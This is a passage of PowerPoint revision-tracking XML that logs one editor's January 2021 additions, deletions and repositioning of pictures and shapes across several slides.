        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:39:41.438" v="754" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:picMk id="6" creationId="{B5715245-A97A-4F08-95C8-AC681CD029F7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:52:53.005" v="274"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:picMk id="7" creationId="{10B955AB-E512-4C43-9776-031953220563}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:39:53.329" v="756" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:picMk id="8" creationId="{B9D24003-B6E1-4B4B-9827-7A2540E01C4C}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:55:23.634" v="292"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="359293037" sldId="332"/>
            <ac:picMk id="10" creationId="{54E5FAAA-553A-4618-B76B-B9120F0CE66D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6:18.278" v="715" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="320117401" sldId="334"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:36:16.122" v="714" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320117401" sldId="334"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:30:56.649" v="87"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320117401" sldId="334"/>
            <ac:picMk id="4" creationId="{3567362D-739A-43F8-9CCB-F23F528830DA}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:36:18.278" v="715" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320117401" sldId="334"/>
            <ac:picMk id="4" creationId="{DAD8B377-1A1B-4C43-B6CF-76D41B158CB0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:33:44.045" v="111"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320117401" sldId="334"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:32:38.637" v="97"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320117401" sldId="334"/>
            <ac:picMk id="7" creationId="{CAA18DC1-7FA4-4C41-852E-38DCE9EE33AB}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:33:41.998" v="110"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320117401" sldId="334"/>
            <ac:picMk id="8" creationId="{13560F34-CC6E-4E08-98CF-62CA4D37519F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:25:38.824" v="654"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="320117401" sldId="334"/>
            <ac:picMk id="9" creationId="{D212FC81-8A73-4135-A4AC-2E32FB3C00CC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6:51.388" v="722" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="412094474" sldId="335"/>
        </pc:sldMkLst>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:38:40.164" v="128"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="412094474" sldId="335"/>
            <ac:picMk id="2" creationId="{544C71B5-06A9-4A4E-B7BA-89C7E0C3DBE2}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:36:51.388" v="722" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="412094474" sldId="335"/>
            <ac:picMk id="4" creationId="{2F7FBAAB-5A0B-4AAA-8230-20D1789BD714}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:38:37.632" v="127"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="412094474" sldId="335"/>
            <ac:picMk id="6" creationId="{B55E332C-4ACE-4570-9116-AF21D098FF7D}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:36:38.388" v="718"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="412094474" sldId="335"/>
            <ac:picMk id="7" creationId="{F5AA1B06-67A6-4B1A-8579-3120970E0576}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:00:48.898" v="318" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2695669782" sldId="336"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:58:45.049" v="298"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2695669782" sldId="336"/>
            <ac:picMk id="4" creationId="{66DED088-5FD7-467C-BA66-81458262CE2E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:00:32.177" v="316"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2695669782" sldId="336"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:59:59.801" v="309"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2695669782" sldId="336"/>
            <ac:picMk id="6" creationId="{C4CE573E-8A4F-437C-8A5D-FF19880550D1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:00:48.898" v="318" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2695669782" sldId="336"/>
            <ac:picMk id="7" creationId="{B83B5340-FA55-4499-B2BD-CB8782EDE74A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7:30.279" v="728" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2220092666" sldId="340"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:37:30.279" v="728" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2220092666" sldId="340"/>
            <ac:picMk id="4" creationId="{5EC8C46E-96E2-43EE-924D-5B9AED5C56A8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:53:39.039" v="158"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2220092666" sldId="340"/>
            <ac:picMk id="5" creationId="{AED842AE-596F-4922-9F6C-9EBE38B2117B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7:42.389" v="730" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2947031761" sldId="343"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:37:40.858" v="729" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2947031761" sldId="343"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:01:42.633" v="202"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2947031761" sldId="343"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:57:28.344" v="173"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2947031761" sldId="343"/>
            <ac:picMk id="4" creationId="{CE9D210C-42D3-43E4-B7CF-BB8F6B48F5BE}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod ord">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:03:24.792" v="206"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2947031761" sldId="343"/>
            <ac:picMk id="6" creationId="{B668A2E3-1AD9-48B8-8CCA-EB9246522369}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T21:57:38.969" v="175"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2947031761" sldId="343"/>
            <ac:picMk id="7" creationId="{E87804BF-63F6-4521-BF5A-253B4231F75E}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:37:42.389" v="730" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2947031761" sldId="343"/>
            <ac:picMk id="9" creationId="{2A99C9EA-5AE3-4965-B045-1C3322484297}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp modNotes">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T01:27:36" v="933"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="286808471" sldId="344"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T01:27:25.484" v="932" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="286808471" sldId="344"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:38:58.484" v="749" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1854475123" sldId="345"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:38:47.234" v="746" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1854475123" sldId="345"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:28:59.995" v="226"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1854475123" sldId="345"/>
            <ac:picMk id="4" creationId="{473CD014-BAB8-475D-9C5B-BE44F6A50DBF}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:38:58.484" v="749" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1854475123" sldId="345"/>
            <ac:picMk id="5" creationId="{BA790414-8B4C-429D-B675-151445C94BD4}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:28:47.636" v="223"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1854475123" sldId="345"/>
            <ac:picMk id="11" creationId="{624D6861-C1E1-48C3-9877-0F9585600D25}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:39:13.563" v="751" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3067747931" sldId="346"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:39:13.563" v="751" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3067747931" sldId="346"/>
            <ac:picMk id="4" creationId="{E70C209E-2708-4441-AC9E-E076EA663E50}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:31:35.021" v="236"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3067747931" sldId="346"/>
            <ac:picMk id="5" creationId="{5D1261F5-B70E-4621-A854-C0573E09264F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod modShow">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:29:08.501" v="676"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3454021984" sldId="354"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T20:01:58.566" v="23"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3454021984" sldId="354"/>
            <ac:picMk id="2" creationId="{7938437D-A2F7-4D4D-8FEE-9F5A4FFACC1A}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:29:05.298" v="675"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3454021984" sldId="354"/>
            <ac:picMk id="4" creationId="{424BF7AB-612B-40F6-A498-5BF0F3846473}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:17:41.466" v="354" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3361478584" sldId="400"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:17:41.466" v="354" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361478584" sldId="400"/>
            <ac:picMk id="4" creationId="{CD9D8849-8181-40E7-8AB1-5C8C874AB696}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:17:27.981" v="352"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3361478584" sldId="400"/>
            <ac:picMk id="5" creationId="{3F9FCD67-9C0D-46B7-9E98-533D6317AE32}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp modNotes">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:14:55.364" v="641" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3145720203" sldId="401"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:13:28.455" v="628"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145720203" sldId="401"/>
            <ac:picMk id="4" creationId="{0807FA18-405A-4CEB-9412-E8E022639E14}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:44:09.850" v="355"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145720203" sldId="401"/>
            <ac:picMk id="5" creationId="{8D6C9E3F-F9C1-4783-BA13-9BD932AA629B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T23:46:09.305" v="362"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145720203" sldId="401"/>
            <ac:picMk id="6" creationId="{A563CF51-C935-4D7B-8DE2-581C54048650}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:14:13.191" v="637" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145720203" sldId="401"/>
            <ac:picMk id="8" creationId="{7D51C373-1E8A-41D6-964E-A8C9341A36A0}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:14:55.364" v="641" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145720203" sldId="401"/>
            <ac:picMk id="10" creationId="{750BB143-9842-438D-AAB7-CE6B92F754E7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:14:17.456" v="638" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3145720203" sldId="401"/>
            <ac:cxnSpMk id="9" creationId="{82828F41-DB64-4FC4-90C8-39CC79A21318}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:08:45.434" v="620" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3454200938" sldId="404"/>
        </pc:sldMkLst>
        <pc:picChg chg="add mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:08:45.434" v="620" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3454200938" sldId="404"/>
            <ac:picMk id="2" creationId="{210E2D70-B6D2-4F20-9C3F-22F2741E218F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-30T22:44:45.248" v="266"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3454200938" sldId="404"/>
            <ac:picMk id="2" creationId="{C1E43231-C231-409B-A3E5-74BA302A186F}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="del mod">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:08:01.042" v="607"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3454200938" sldId="404"/>
            <ac:picMk id="4" creationId="{28D4919C-A256-4701-86DB-C787472FC53D}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add replId">
        <pc:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:34:29.729" v="696" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1636140128" sldId="405"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:27:47.812" v="668"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1636140128" sldId="405"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod modCrop">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:33:56.806" v="692" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1636140128" sldId="405"/>
            <ac:picMk id="3" creationId="{FF969B99-1023-42C8-A4FC-64AFDD893778}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod modCrop">
          <ac:chgData name="yf1398@nyu.edu" userId="S::urn:spo:guest#yf1398@nyu.edu::" providerId="AD" clId="Web-{F7801BCA-F386-4FE7-A96E-5947FB07F4BF}" dt="2021-01-31T00:34:29.729" v="696" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1636140128" sldId="405"/>
            <ac:picMk id="4" creationId="{9C5281AC-C978-4A53-9436-68A677F47D15}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="delSp modSp add replId">
